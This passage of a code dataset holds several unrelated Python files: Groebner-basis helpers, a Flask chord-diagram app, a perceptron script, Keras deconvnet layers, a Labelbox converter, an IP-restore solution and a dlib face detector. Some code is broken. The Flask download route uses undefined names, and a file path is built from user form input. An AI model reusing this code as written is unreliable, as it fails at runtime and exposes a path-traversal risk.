= G.copy()\r\n D = set()\r\n\r\n while C:\r\n # select a pair (h, g) by popping an element from C\r\n ig = C.pop()\r\n g = f[ig]\r\n mg = g.LM\r\n LCMhg = monomial_lcm(mh, mg)\r\n\r\n def lcm_divides(ip):\r\n # LCM(LM(h), LM(p)) divides LCM(LM(h), LM(g))\r\n m = monomial_lcm(mh, f[ip].LM)\r\n return monomial_div(LCMhg, m)\r\n\r\n # HT(h) and HT(g) disjoint: mh*mg == LCMhg\r\n if monomial_mul(mh, mg) == LCMhg or (\r\n not any(lcm_divides(ipx) for ipx in C) and\r\n not any(lcm_divides(pr[1]) for pr in D)):\r\n D.add((ih, ig))\r\n\r\n E = set()\r\n\r\n while D:\r\n # select h, g from D (h the same as above)\r\n ih, ig = D.pop()\r\n mg = f[ig].LM\r\n LCMhg = monomial_lcm(mh, mg)\r\n\r\n if not monomial_mul(mh, mg) == LCMhg:\r\n E.add((ih, ig))\r\n\r\n # filter old pairs\r\n B_new = set()\r\n\r\n while B:\r\n # select g1, g2 from B (-> CP)\r\n ig1, ig2 = B.pop()\r\n mg1 = f[ig1].LM\r\n mg2 = f[ig2].LM\r\n LCM12 = monomial_lcm(mg1, mg2)\r\n\r\n # if HT(h) does not divide lcm(HT(g1), HT(g2))\r\n if not monomial_div(LCM12, mh) or \\\r\n monomial_lcm(mg1, mh) == LCM12 or \\\r\n monomial_lcm(mg2, mh) == LCM12:\r\n B_new.add((ig1, ig2))\r\n\r\n B_new |= E\r\n\r\n # filter polynomials\r\n G_new = set()\r\n\r\n while G:\r\n ig = G.pop()\r\n mg = f[ig].LM\r\n\r\n if not monomial_div(mg, mh):\r\n G_new.add(ig)\r\n\r\n G_new.add(ih)\r\n\r\n return G_new, B_new\r\n # end of update ################################\r\n\r\n if not f:\r\n return []\r\n f1 = [func for func in f[:-n]]\r\n for p in f[-n:]:\r\n r = p.rem(f1)\r\n if r != 0:\r\n f1.append(r)\r\n f = f1\r\n I = {} # ip = I[p]; p = f[ip]\r\n F = set()\r\n G = set() # set of indices of intermediate would-be Groebner basis\r\n CP = set() # set of pairs of indices of critical pairs\r\n\r\n for i, h in enumerate(f):\r\n I[h] = i #Setup polynomial-index dictionary\r\n if i >= len(f)-n:\r\n F.add(i)\r\n else:\r\n G.add(i)\r\n \r\n #####################################\r\n # algorithm GROEBNERNEWS2 in [BW] page 232\r\n while F:\r\n # select p with minimum monomial according to the monomial ordering\r\n h = min([f[x] for x in F], key=lambda f: order(f.LM))\r\n ih = I[h]\r\n F.remove(ih)\r\n G, CP = update(G, CP, ih)\r\n\r\n # count the number of critical pairs which reduce to zero\r\n reductions_to_zero = 0\r\n\r\n while CP:\r\n ig1, ig2 = select(CP)\r\n CP.remove((ig1, ig2))\r\n \r\n h = spoly(f[ig1], f[ig2], ring)\r\n # ordering divisors is on average more efficient [Cox] page 111\r\n G1 = sorted(G, key=lambda g: order(f[g].LM))\r\n ht = normal(h, G1)\r\n\r\n if ht:\r\n G, CP = update(G, CP, ht[1])\r\n else:\r\n reductions_to_zero += 1\r\n\r\n ######################################\r\n # now G is a Groebner basis; reduce it\r\n Gr = set()\r\n\r\n for ig in G:\r\n ht = normal(f[ig], G - set([ig]))\r\n\r\n if ht:\r\n Gr.add(ht[1])\r\n\r\n Gr = [f[ig] for ig in Gr]\r\n\r\n # order according to the monomial ordering\r\n Gr = sorted(Gr, key=lambda f: order(f.LM), reverse=True)\r\n\r\n return Gr\r\n\r\nimport numpy as np\r\nfrom math import floor\r\nimport time\r\nfrom itertools import product\r\nfrom itertools import combinations\r\nfrom sympy import Matrix, var\r\n\r\ndef make_linearEqns(A,z):\r\n #Takes matrix A and variable list z and converts it into a list of linear equations\r\n zmat = Matrix(z)\r\n A = Matrix(A)\r\n A = A.rref()[0]\r\n lin_fcns = A*zmat\r\n lin_fcns = [f for f in lin_fcns if f != 0]\r\n lin_fcns = lin_fcns[::-1]\r\n return(list(lin_fcns))\r\n\r\ndef hypercube_matrix(R):\r\n A = np.zeros((len(R),len(R[0])))\r\n for i,r in enumerate(R):\r\n for j,letter in enumerate(r):\r\n if letter == '0':\r\n A[i,j] = -1\r\n else:\r\n A[i,j] = int(letter)\r\n return(A)\r\n\r\ndef hypercube_polys(k):\r\n variable_string = ''\r\n num_digits = len(str(k))\r\n for i in range(0,k):\r\n count = str(i+1).zfill(num_digits)\r\n variable = ',z'+count\r\n variable_string = variable_string +variable\r\n variable_string = variable_string[1:]\r\n z = var(variable_string)\r\n P = []\r\n f = 0\r\n for i in range(k):\r\n P.append(z[i]*(z[i]-1)*(z[i]+1))\r\n f = f + z[i]**2\r\n fs = []\r\n for i in range(floor(k/2)):\r\n fi = f-2*(i+1)\r\n fs.append(fi)\r\n return(P,fs,z)\r\n\r\ndef check_hcube_resolving(R,k):\r\n #Create matrix A from R\r\n A = hypercube_matrix(R)\r\n #Get pre-computed Groebner basis and variables for H_k,2\r\n G,fs,z = hypercube_polys(k)\r\n #Get linear functions from A matrix\r\n lin_fcns = make_linearEqns(A,z)\r\n n = len(lin_fcns)\r\n #Get Grobner basis of P and linear functions\r\n G = groebnerbasis(True,G+lin_fcns,n,order = 'lex')\r\n for i,fi in enumerate(fs):\r\n #Compute Grobner basis of G+fi\r\n Gi = groebnerbasis(True,list(G)+[fi],1,order = 'lex')\r\n #Solutions iff Gi neq 1, if Gi neq 1 then R is not resolving\r\n if not (list(Gi) == [1]):\r\n return False\r\n return True","sub_path":"Lucas/Generate Resolving Sets/helper_funcs.py","file_name":"helper_funcs.py","file_ext":"py","file_size_in_byte":17829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"216736607","text":"from flask import (\n render_template,\n request,\n Blueprint,\n make_response\n )\n\nfrom diagram import MultiFingerChord\nfrom .forms import ChordForm, DownloadForm\n\nimport cairosvg\nfrom wand.image import Image\n\nimport yaml\n\nfrom .config import DEFAULT_STYLE\n\nmy_view = Blueprint('my_view', __name__)\n\n@my_view.route('/', methods=['GET', 'POST'])\ndef home():\n def create_diagram(chord_form):\n \"\"\"Create chord diagram and return filename.\"\"\"\n extras = [\n dict(\n zip(['string', 'fret', 'finger'], x.split(',')[:3])\n )\n for x in chord_form.extras.data.splitlines()\n ]\n\n chord_style = DEFAULT_STYLE\n\n chord_style['drawing']['label_all_frets'] = chord_form.label_all.data\n print(chord_style)\n\n\n diagram = MultiFingerChord(\n positions=chord_form.positions.data,\n fingers=chord_form.fingers.data,\n barre=chord_form.barre.data,\n title=chord_form.title.data,\n style=chord_style,\n extras=extras\n )\n\n # This is obviously dumb, but works for now\n filename = 'static/ukulele/{title}_{pos}_{fin}_{bar}.svg'.format(\n title=chord_form.title.data,\n pos=chord_form.positions.data,\n fin=chord_form.fingers.data,\n bar=chord_form.barre.data,\n )\n diagram.save(filename)\n\n return filename\n\n chord_form = ChordForm(request.form)\n dl_form = DownloadForm(request.form)\n\n if request.method == 'POST':\n # Diagram\n if chord_form.validate_on_submit():\n return render_template(\n 'index.html',\n diagram=create_diagram(chord_form),\n chord_form=chord_form,\n dl_form=dl_form\n )\n\n return render_template(\n 'index.html',\n diagram=create_diagram(chord_form),\n chord_form=chord_form,\n dl_form=dl_form\n )\n\n@my_view.route('/download', methods=['POST'])\ndef download_as():\n if request.method == 'POST':\n if format == 'png_t':\n # convert using cairosvg\n result = cairosvg.svg2png(imgdata)\n elif format == 'png':\n i = wand.image.Image(blob=imgdata)\n result = i.convert('png').make_blob()\n else:\n result = imgdata\n\n return send_file(io.BytesIO(imgdata), as_attachment=True, filename='chord.svg')\n\n@my_view.route('/api/v1/chord/', methods=['POST'])\ndef generate_chord():\n \"\"\"\n process the request body and return SVG content (no XML header)\n \"\"\"\n content = request.get_json(silent=True)\n chordobj = MultiFingerChord(\n positions=content.get('positions', '0000'),\n fingers=content.get('fingers','----'),\n barre=content.get('barre', None),\n title=content.get('title', 'Am7'),\n extras=content.get('extras', None),\n style=chord_style\n ).render()\n chordobj.seek(0)\n header, data = chordobj.read().splitlines()\n\n # export type\n fmt = content.get('format', 'svg')\n\n if fmt != 'svg':\n content_type = 'image/png'\n ext = 'png'\n else:\n content_type = 'image/svg+xml'\n ext = 'svg'\n\n # OK, we have a chord object, let's return it\n if fmt == 'png_t':\n # do cairo stuff\n data = cairosvg.svg2png(bytestring=data.encode('utf-8'))\n\n if fmt == 'png':\n with Image(blob=data.encode('utf-8')) as i:\n data = i.convert('png').make_blob()\n\n response = make_response(data)\n response.headers.set('Content-Type', content_type)\n response.headers.set('Content-Disposition', 'attachment', filename=\"{}.{}\".format(content.get('title'), ext))\n\n return response\n\n","sub_path":"views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"183406928","text":"import argparse\nimport pprint\nimport numpy as np\nfrom nbc import read_data, zero_one_loss\nimport crossv\nimport matplotlib.pyplot as plt\nimport pylab\n\ndef define_attr(data):\n\tattr = data[0][1:]\n\tnum_rows = len(data)\n\tnum_attr = len(attr)\n\tattr_value_dict = {}\n\n\tfor i in range(num_attr):\n\t\tattr_values = [data[j][i + 1] for j in range(1,num_rows)]\n\t\tvalues = set(attr_values)\n\t\tattr_value_dict[attr[i]] = dict([(key, value) for value, key in enumerate(values, 1)])\n\n\treturn attr_value_dict\n\ndef transform_data(data, value_dict):\n\tattr = data[0][1:]\n\tnum_rows = len(data)\n\tnum_attr = len(attr)\n\n\tfor i in range(1,num_rows):\n\t\tdata[i][0] = 0 if data[i][0] == '0' else 1\n\t\tfor j in range(num_attr):\n\t\t\t'''try:\n\t\t\t\tdata[i][j] = float(data[i][j].strip())\n\t\t\texcept Exception as e:'''\n\t\t\tdata[i][j + 1] = value_dict[attr[j]][data[i][j + 1]]\n\n\treturn data\n\ndef predict(data, weights, bias):\n\t# data = np.array(data)\n\t# print data\n\tprediction = []\n\tproduct = data.dot(weights)\n\t# print product\n\t#prediction = 1 if product > -1*bias else 0\n\tfor i in np.nditer(product):\n\t\tprediction.append(1 if i > -1*bias else 0)\n\treturn prediction\n\ndef training(train_data, true_class, alpha, T):\n\tnum_attr = len(train_data[0])\n\tweights = np.zeros(num_attr)\n\tbias = 0\n\t\n\tfor e in range(T):\n\t\twrong = 0\n\t\tfor row_num in range(train_data.shape[0]):\n\t\t\t#print \"initial weights:\", weights\n\t\t\tprediction = predict(train_data[row_num], weights, bias)\n\t\t\t# print prediction\n\t\t\t# print true_class[row_num]\n\t\t\tif prediction[0] != true_class[row_num]:\n\t\t\t\t# bias += alpha * error\n\t\t\t\twrong += 1\n\t\t\t\tchange = np.multiply(alpha * (true_class[row_num]-prediction[0]), train_data[row_num])\n\t\t\t\t# print change\n\t\t\t\tweights = np.add(weights, change)\n\t\t\t\tbias += alpha * (true_class[row_num]-prediction[0])\n\t\t\t# prediction = predict(train_data[row_num], weights, bias)\n\t\t\t# print prediction, \"\\n\"\n\t\t\t#print \"updated weights:\", weights\n\t\t# print \"error rate\", float(wrong)/train_data.shape[0]\n\treturn weights\n\ndef make_matrix(train_data):\n\tvalue_dict = define_attr(train_data)\n\ttrans_data = transform_data(train_data, value_dict)\n\ttrans_data.pop(0)\n\ttrue_class = [data_row.pop(0) for data_row in trans_data]\n\n\tdata_mat = np.array(trans_data)\n\treturn data_mat, true_class\n\n\ndef extract_weights(train_data):\n\tdata_mat, true_class = make_matrix(train_data)\n\t#predict(data_mat, None, None)\n\n\treturn training(data_mat, true_class, 0.5, 100)\n\n\ndef main():\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument(\"datafile\", help=\"data file (yelp2.csv)\", default=None)\n\targs = parser.parse_args()\n\n\tif args.datafile == None: raise Exception(\"The data file is not found\")\n\n\t# train_data = read_data(args.training)\n\n\t# extract_weights(train_data)\n\n\ttraining_set, test_set = crossv.split_data(args.datafile)\n\tresult = crossv.validation(training_set, test_set)\n\n\tresult_p = crossv.validation(training_set, test_set, \"perceptron\")\n\n # pprint.pprint(result)\n\tx_axis = result.keys()\n\tx_axis.sort()\n\n\tzero_one_nbc = []\n\n\tzero_one_perceptron = []\n # square_perceptron = []\n\n\tbaseline = []\n\n\tfor index in x_axis:\n\t\tzero_one_nbc.append(result[index][0])\n\t\tbaseline.append(result[index][2])\n\t\tzero_one_perceptron.append(result_p[index])\n\tpylab.plot(x_axis, zero_one_nbc, label=\"nbc\")\n\tpylab.plot(x_axis, zero_one_perceptron, label=\"perceptron\")\n\tpylab.plot(x_axis, baseline, label=\"baseline\")\n\tpylab.legend(loc='upper left')\n\tpylab.show()\n\t# value_dict = define_attr(train_data)\n\t# trans_data = transform_data(train_data, value_dict)\n\t# trans_data.pop(0)\n\t# true_class = [data_row.pop(0) for data_row in trans_data]\n\n\t# data_mat = np.array(trans_data)\n\t# #predict(data_mat, None, None)\n\n\t# weights = training(data_mat, true_class, 2, 1000)\n\nif __name__ == \"__main__\":\n\tmain()","sub_path":"hw3/perceptron.py","file_name":"perceptron.py","file_ext":"py","file_size_in_byte":3720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"614642459","text":"import numpy as np\n\nfrom keras.layers import (\n Input,\n Dense)\nfrom keras.layers.convolutional import (\n Convolution2D)\nfrom keras import backend as K\n\n\nclass DLayer:\n def __init__(self, layer):\n self.layer = layer\n self.up_data = None\n self.down_data = None\n self.up_func = None\n self.down_func = None\n\n def up(self, data, learning_phase=0):\n \"\"\"\n function to compute activation in forward pass\n # Arguments\n data: Data to be operated in forward pass\n learning_phase: learning_phase of Keras, 1 or 0\n # Returns\n Activation\n \"\"\"\n data = self.up_func([data, learning_phase])\n self.up_data = data if K.backend() == 'theano' else data[0]\n return self.up_data\n\n def down(self, data, learning_phase=0):\n \"\"\"\n function to compute activation in backward pass\n # Arguments\n data: Data to be operated in backward pass\n learning_phase: learning_phase of Keras, 1 or 0\n # Returns\n Activation\n \"\"\"\n data = self.down_func([data, learning_phase])\n self.down_data = data if K.backend() == 'theano' else data[0]\n return self.down_data\n\n\nclass DConvolution2D(DLayer):\n \"\"\"\n A class to define forward and backward operation on Convolution2D\n \"\"\"\n\n def __init__(self, layer):\n \"\"\"\n # Arguments\n layer: an instance of Convolution2D layer, whose configuration\n will be used to initiate DConvolution2D(input_shape,\n output_shape, weights)\n \"\"\"\n super(DConvolution2D, self).__init__(layer)\n\n weights = layer.get_weights()\n W = weights[0]\n b = weights[1]\n\n # Set up_func for DConvolution2D\n input = Input(shape=layer.input_shape[1:])\n\n output = Convolution2D(\n nb_filter=layer.nb_filter,\n nb_row=layer.nb_row,\n nb_col=layer.nb_col,\n border_mode=layer.border_mode,\n weights=[W, b]\n )(input)\n self.up_func = _K_function([input, K.learning_phase()], output)\n\n # Flip W horizontally and vertically,\n # and set down_func for DConvolution2D\n if K.image_dim_ordering() == 'th':\n W = np.transpose(W, (1, 0, 2, 3))\n W = W[:, :, ::-1, ::-1]\n nb_down_filter = W.shape[0]\n nb_down_row = W.shape[2]\n nb_down_col = W.shape[3]\n else:\n W = np.transpose(W, (0, 1, 3, 2))\n W = W[::-1, ::-1, :, :]\n nb_down_filter = W.shape[3]\n nb_down_row = W.shape[0]\n nb_down_col = W.shape[1]\n b = np.zeros(nb_down_filter)\n input = Input(shape=layer.output_shape[1:])\n output = Convolution2D(\n nb_filter=nb_down_filter,\n nb_row=nb_down_row,\n nb_col=nb_down_col,\n border_mode='same',\n weights=[W, b]\n )(input)\n self.down_func = _K_function([input, K.learning_phase()], output)\n\n\nclass DDense(DLayer):\n \"\"\"\n A class to define forward and backward operation on Dense\n \"\"\"\n\n def __init__(self, layer):\n \"\"\"\n # Arguments\n layer: an instance of Dense layer, whose configuration\n will be used to initiate DDense(input_shape,\n output_shape, weights)\n \"\"\"\n super(DDense, self).__init__(layer)\n weights = layer.get_weights()\n W = weights[0]\n b = weights[1]\n\n # Set up_func for DDense\n input = Input(shape=layer.input_shape[1:])\n output = Dense(output_dim=layer.output_shape[1],\n weights=[W, b])(input)\n self.up_func = _K_function([input, K.learning_phase()], output)\n\n # Transpose W and set down_func for DDense\n W = W.transpose()\n self.input_shape = layer.input_shape\n self.output_shape = layer.output_shape\n b = np.zeros(self.input_shape[1])\n flipped_weights = [W, b]\n input = Input(shape=self.output_shape[1:])\n output = Dense(\n output_dim=self.input_shape[1],\n weights=flipped_weights)(input)\n self.down_func = _K_function([input, K.learning_phase()], output)\n\n\nclass DPooling(DLayer):\n \"\"\"\n A class to define forward and backward operation on Pooling\n \"\"\"\n\n def __init__(self, layer):\n \"\"\"\n # Arguments\n layer: an instance of Pooling layer, whose configuration\n will be used to initiate DPooling(input_shape,\n output_shape, weights)\n \"\"\"\n super(DPooling, self).__init__(layer)\n self.poolsize = layer.pool_size\n\n def up(self, data, learning_phase=0):\n \"\"\"\n function to compute pooling output in forward pass\n # Arguments\n data: Data to be operated in forward pass\n learning_phase: learning_phase of Keras, 1 or 0\n # Returns\n Pooled result\n \"\"\"\n [self.up_data, self.switch] = \\\n self.__max_pooling_with_switch(data, self.poolsize)\n return self.up_data\n\n def down(self, data, learning_phase=0):\n \"\"\"\n function to compute unpooling output in backward pass\n # Arguments\n data: Data to be operated in forward pass\n learning_phase: learning_phase of Keras, 1 or 0\n # Returns\n Unpooled result\n \"\"\"\n self.down_data = self.__max_unpooling_with_switch(data, self.switch)\n return self.down_data\n\n def __max_pooling_with_switch(self, input, poolsize):\n \"\"\"\n Compute pooling output and switch in forward pass, switch stores\n location of the maximum value in each poolsize * poolsize block\n # Arguments\n input: data to be pooled\n poolsize: size of pooling operation\n # Returns\n Pooled result and Switch\n \"\"\"\n switch = np.zeros(input.shape)\n\n if K.image_dim_ordering() == 'th':\n samples, dims, rows, cols = input.shape\n else:\n samples, rows, cols, dims = input.shape\n\n row_poolsize = int(poolsize[0])\n col_poolsize = int(poolsize[1])\n rows = rows // row_poolsize\n cols = cols // col_poolsize\n\n if K.image_dim_ordering() == 'th':\n out_shape = samples, dims, rows, cols\n else:\n out_shape = samples, rows, cols, dims\n\n pooled = np.zeros(out_shape)\n\n for sample in range(samples):\n for dim in range(dims):\n for row in range(rows):\n for col in range(cols):\n if K.image_dim_ordering() == 'th':\n patch = input[sample,\n dim,\n row * row_poolsize: (row + 1) * row_poolsize,\n col * col_poolsize: (col + 1) * col_poolsize]\n max_value = patch.max()\n pooled[sample, dim, row, col] = max_value\n else:\n patch = input[sample,\n row * row_poolsize: (row + 1) * row_poolsize,\n col * col_poolsize: (col + 1) * col_poolsize,\n dim]\n max_value = patch.max()\n pooled[sample, row, col, dim] = max_value\n\n max_col_index = patch.argmax(axis=1)\n max_cols = patch.max(axis=1)\n max_row = max_cols.argmax()\n max_col = max_col_index[max_row]\n if K.image_dim_ordering() == 'th':\n switch[sample,\n dim,\n row * row_poolsize + max_row,\n col * col_poolsize + max_col] = 1\n else:\n switch[sample,\n row * row_poolsize + max_row,\n col * col_poolsize + max_col,\n dim] = 1\n\n return [pooled, switch]\n\n # Compute unpooled output using pooled data and switch\n def __max_unpooling_with_switch(self, input, switch):\n \"\"\"\n Compute unpooled output using pooled data and switch\n # Arguments\n input: data to be pooled\n poolsize: size of pooling operation\n switch: switch storing location of each elements\n # Returns\n Unpooled result\n \"\"\"\n if K.image_dim_ordering() == 'th':\n row_i, col_i = 2, 3\n else:\n row_i, col_i = 1, 2\n\n tile = np.ones((switch.shape[row_i] // input.shape[row_i],\n switch.shape[col_i] // input.shape[col_i]))\n\n if K.image_dim_ordering() == 'th':\n out = np.kron(input, tile)\n else:\n out = np.kron(np.transpose(input, (0, 3, 1, 2)), tile)\n out = np.transpose(out, (0, 2, 3, 1))\n\n unpooled = out * switch\n return unpooled\n\n\nclass DActivation(DLayer):\n \"\"\"\n A class to define forward and backward operation on Activation\n \"\"\"\n\n def __init__(self, layer, linear=False):\n \"\"\"\n # Arguments\n layer: an instance of Activation layer, whose configuration\n will be used to initiate DActivation(input_shape,\n output_shape, weights)\n \"\"\"\n super(DActivation, self).__init__(layer)\n self.linear = linear\n self.activation = layer.activation\n input = K.placeholder(shape=layer.output_shape)\n\n output = self.activation(input)\n # According to the original paper,\n # In forward pass and backward pass, do the same activation(relu)\n self.up_func = _K_function(\n [input, K.learning_phase()], output)\n self.down_func = _K_function(\n [input, K.learning_phase()], output)\n\n\nclass DFlatten(DLayer):\n \"\"\"\n A class to define forward and backward operation on Flatten\n \"\"\"\n\n def __init__(self, layer):\n \"\"\"\n # Arguments\n layer: an instance of Flatten layer, whose configuration\n will be used to initiate DFlatten(input_shape,\n output_shape, weights)\n \"\"\"\n super(DFlatten, self).__init__(layer)\n self.shape = layer.input_shape[1:]\n self.up_func = _K_function(\n [layer.input, K.learning_phase()], layer.output)\n\n def down(self, data, learning_phase=0):\n \"\"\"\n function to unflatten input in backward pass\n # Arguments\n data: Data to be operated in backward pass\n learning_phase: learning_phase of Keras, 1 or 0\n # Returns\n Recovered data\n \"\"\"\n new_shape = [data.shape[0]] + list(self.shape)\n assert np.prod(self.shape) == np.prod(data.shape[1:])\n self.down_data = np.reshape(data, new_shape)\n return self.down_data\n\n\nclass DInput(DLayer):\n \"\"\"\n A class to define forward and backward operation on Input\n \"\"\"\n\n def up(self, data, learning_phase=0):\n \"\"\"\n function to operate input in forward pass, the input and output\n are the same\n # Arguments\n data: Data to be operated in forward pass\n learning_phase: learning_phase of Keras, 1 or 0\n # Returns\n data\n \"\"\"\n self.up_data = data\n return self.up_data\n\n def down(self, data, learning_phase=0):\n \"\"\"\n function to operate input in backward pass, the input and output\n are the same\n # Arguments\n data: Data to be operated in backward pass\n learning_phase: learning_phase of Keras, 1 or 0\n # Returns\n data\n \"\"\"\n self.down_data = data\n return self.down_data\n\n\ndef _K_function(inputs, out):\n if K.backend() == 'theano' or isinstance(out, (list, tuple)):\n return K.function(inputs, out)\n else:\n return K.function(inputs, [out])","sub_path":"deconvnet/layers.py","file_name":"layers.py","file_ext":"py","file_size_in_byte":12265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"610267052","text":"import Augmentor\nimport os\nimport json\nimport requests\nimport cv2\nimport datetime as dt\nimport numpy as np\nfrom PIL import Image\nfrom shapely import wkt\nfrom pascal_voc_writer import Writer as PascalWriter\n\nfrom .generator.pascal_voc import PascalVOCGenerator\n\n\nclass LabeledImagePascalVOC:\n \"\"\" Custom class matching returned json object of labelbox.io. \"\"\"\n\n ANNOTATION_PASCAL_VOC = 'Pascal VOC'\n SKIPPED_LABEL = 'Skip'\n\n def __init__(self, logger, *args, **kwargs):\n self._logger = logger(__name__)\n self._id = kwargs['ID']\n self._source_img_url = kwargs['Labeled Data']\n self._created_by = kwargs['Created By']\n self._project_name = kwargs['Project Name']\n self._seconds_to_label = kwargs['Seconds to Label']\n self._images_dir = kwargs['Images Dir']\n self._resized_image_dir = kwargs['Resized Image Dir']\n self._annotations_dir = kwargs['Annotations Dir']\n self._required_img_height = kwargs['Required Image Height']\n self._required_img_width = kwargs['Required Image Width']\n self.label_names = set()\n self._file_name = self._source_img_url.rsplit('/', 1)[-1].split('.')[0]\n self._file_ext = '.' + \\\n self._source_img_url.split(\"/\")[-1].split('.')[1]\n self._download_image(kwargs['Label'])\n self._resize_image(self._image_file_path)\n self._generate_pascal_voc_file(logger, kwargs['Label'], apply_reduction=True, debug=True)\n\n def _download_image(self, json_labels):\n \"\"\" Download image from provided link (Cloud link).\"\"\"\n file_name = self._file_name + self._file_ext\n self._image_file_path = os.path.join(self._images_dir, file_name)\n\n if not os.path.exists(self._image_file_path):\n try:\n response = requests.get(self._source_img_url, stream=True)\n response.raw.decode_content = True\n image = Image.open(response.raw)\n self._img_width, self._img_height = image.size\n image.save(self._image_file_path, format=image.format)\n self._logger.info('Downloaded image form source {} at {}'.format(\n self._source_img_url, self._image_file_path))\n\n except requests.exceptions.MissingSchema as e:\n self._logger.exception(\n '\"source_image_url\" attribute must be a URL.')\n except requests.exceptions.ConnectionError as e:\n self._logger.exception(\n 'Failed to fetch image from {}'.format(self._source_img_url))\n else:\n image = Image.open(self._image_file_path)\n self._img_width, self._img_height = image.size\n self._logger.warn('WARN: Skipping file download since it already exist @ {}\\n'.format(\n self._image_file_path))\n\n def _resize_image(self, image_path):\n file_name = self._file_name + self._file_ext\n self._resized_image_path = os.path.join(\n self._resized_image_dir, file_name)\n\n img = cv2.imread(image_path)\n\n height, width = img.shape[:2]\n\n self._aspect_ratio = float(width)/height\n\n scaled_height = 300\n scaled_width = 300\n\n # interpolation method\n if height > self._required_img_height or width > self._required_img_width: # shrinking image\n interp = cv2.INTER_AREA\n else: # stretching image\n interp = cv2.INTER_CUBIC\n\n # aspect ratio of image\n\n # compute scaling and pad sizing\n if self._aspect_ratio > 1: # horizontal image\n new_width = scaled_width\n new_height = np.round(new_width/self._aspect_ratio).astype(int)\n pad_vert = (scaled_height-new_height)/2\n self._pad_top, self._pad_bot = np.floor(\n pad_vert).astype(int), np.ceil(pad_vert).astype(int)\n self._pad_left, self._pad_right = 0, 0\n elif self._aspect_ratio < 1: # vertical image\n new_height = scaled_height\n new_width = np.round(new_height*self._aspect_ratio).astype(int)\n pad_horz = (scaled_width-new_width)/2\n self._pad_left, self._pad_right = np.floor(\n pad_horz).astype(int), np.ceil(pad_horz).astype(int)\n self._pad_top, self._pad_bot = 0, 0\n else: # square image\n new_height, new_width = scaled_height, scaled_width\n self._pad_left, self._pad_right, self._pad_top, self._pad_bot = 0, 0, 0, 0\n\n # factors to scale bounding box values\n self._x_factor = float(width) / self._required_img_width\n self._y_factor = float(height) / (self._required_img_height - self._pad_bot - self._pad_top)\n\n # set pad color\n # color image but only one color provided\n if len(img.shape) is 3 and not isinstance(0, (list, tuple, np.ndarray)):\n padColor = [0]*3\n\n # scale and pad\n scaled_img = cv2.resize(img, (new_width, new_height), interpolation=interp)\n scaled_img = cv2.copyMakeBorder(\n scaled_img, self._pad_top, self._pad_bot, self._pad_left, self._pad_right, borderType=cv2.BORDER_CONSTANT, value=0)\n\n if not os.path.exists(self._resized_image_path):\n cv2.imwrite(self._resized_image_path, scaled_img)\n self._logger.info('Resized image at {}.jpg'.format(\n self._resized_image_path))\n else:\n self._logger.warn('WARN: Skipping file resizing since it already exist @ {}\\n'.format(\n self._resized_image_path))\n\n def _generate_pascal_voc_file(self, logger, json_labels, apply_reduction=False, debug=False):\n \"\"\" Transform WKT polygon to pascal voc. \"\"\"\n config = {\n 'labelbox_id': self._id,\n 'project_name': self._project_name,\n 'json_labels': json_labels,\n 'annotation_dir': self._annotations_dir,\n 'apply_reduction': apply_reduction,\n 'debug': debug\n }\n\n if apply_reduction:\n config.update({\n 'image_path': self._resized_image_path,\n 'image_width': self._required_img_width,\n 'image_height': self._required_img_height,\n 'x_factor': self._x_factor,\n 'y_factor': self._y_factor,\n 'pad_top': self._pad_top,\n 'pad_left': self._pad_left,\n })\n else:\n config.update({\n 'image_path': self._image_file_path,\n 'image_width': self._img_width,\n 'image_height': self._img_height,\n 'x_factor': 1,\n 'y_factor': 1,\n 'pad_top': 0,\n 'pad_left': 0,\n })\n generator = PascalVOCGenerator(logger, config)\n self.label_names.update(generator.label_names)\n","sub_path":"extractor/core/data/labelbox.py","file_name":"labelbox.py","file_ext":"py","file_size_in_byte":6862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"650018355","text":"class Solution(object):\n def check(self, s):\n if len(s) < 2:\n return True\n elif len(s) == 2:\n return \"10\" <= s <= \"99\" # prevent 01,02,03...\n else:\n return \"100\" <= s <= \"255\" # prevent 256,257...\n\n def dfs(self, depth, maxDepth, s, startPos, pos, ans):\n\n if depth == maxDepth:\n if startPos == len(s):\n address = s[0:pos[0]]\n for i in range(1, maxDepth):\n address = address + '.' + s[pos[i - 1]:pos[i]]\n ans.append(address)\n return\n\n for i in range(startPos + 1, startPos + 4):\n if self.check(s[startPos: i]):\n pos[depth] = i\n self.dfs(depth + 1, 4, s, i, pos, ans)\n\n def restoreIpAddresses(self, s):\n \"\"\"\n :type s: str\n :rtype: List[str]\n \"\"\"\n ans = []\n pos = [0, 0, 0, 0]\n self.dfs(0, 4, s, 0, pos, ans)\n\n\ns = Solution()\ns.restoreIpAddresses(\"0000\")","sub_path":"Algorithm/Restore IP Addresses/Restore IP Addresses.py","file_name":"Restore IP Addresses.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"589016206","text":"from enum import Enum\n\nimport dlib\nimport numpy as np\nimport skimage.transform as tr\n\n\nclass FaceDetectorException(Exception):\n pass\n\n\nclass FaceDetector:\n def __init__(self):\n self.detector = dlib.get_frontal_face_detector()\n\n def detect_faces(self, image, *, upscale_factor=1, greater_than=None, get_top=None):\n try:\n face_rects = list(self.detector(image, upscale_factor))\n except Exception as e:\n raise FaceDetectorException(e.args)\n\n if greater_than is not None:\n face_rects = list(\n filter(\n lambda r: r.height() > greater_than and r.width() > greater_than,\n face_rects,\n )\n )\n\n face_rects.sort(key=lambda r: r.width() * r.height(), reverse=True)\n\n if get_top is not None:\n return face_rects[:get_top]\n\n return face_rects\n\n\nclass FaceAlignMask(Enum):\n INNER_EYES_AND_BOTTOM_LIP = [39, 42, 57]\n OUTER_EYES_AND_NOSE = [36, 45, 33]\n\n\nclass FaceAligner:\n def __init__(self, dlib_predictor_path, face_template_path):\n self.predictor = dlib.shape_predictor(dlib_predictor_path)\n self.face_template = np.load(face_template_path)\n\n def get_landmarks(self, image, face_rect):\n points = self.predictor(image, face_rect)\n return np.array(list(map(lambda p: [p.x, p.y], points.parts())))\n\n def align_face(\n 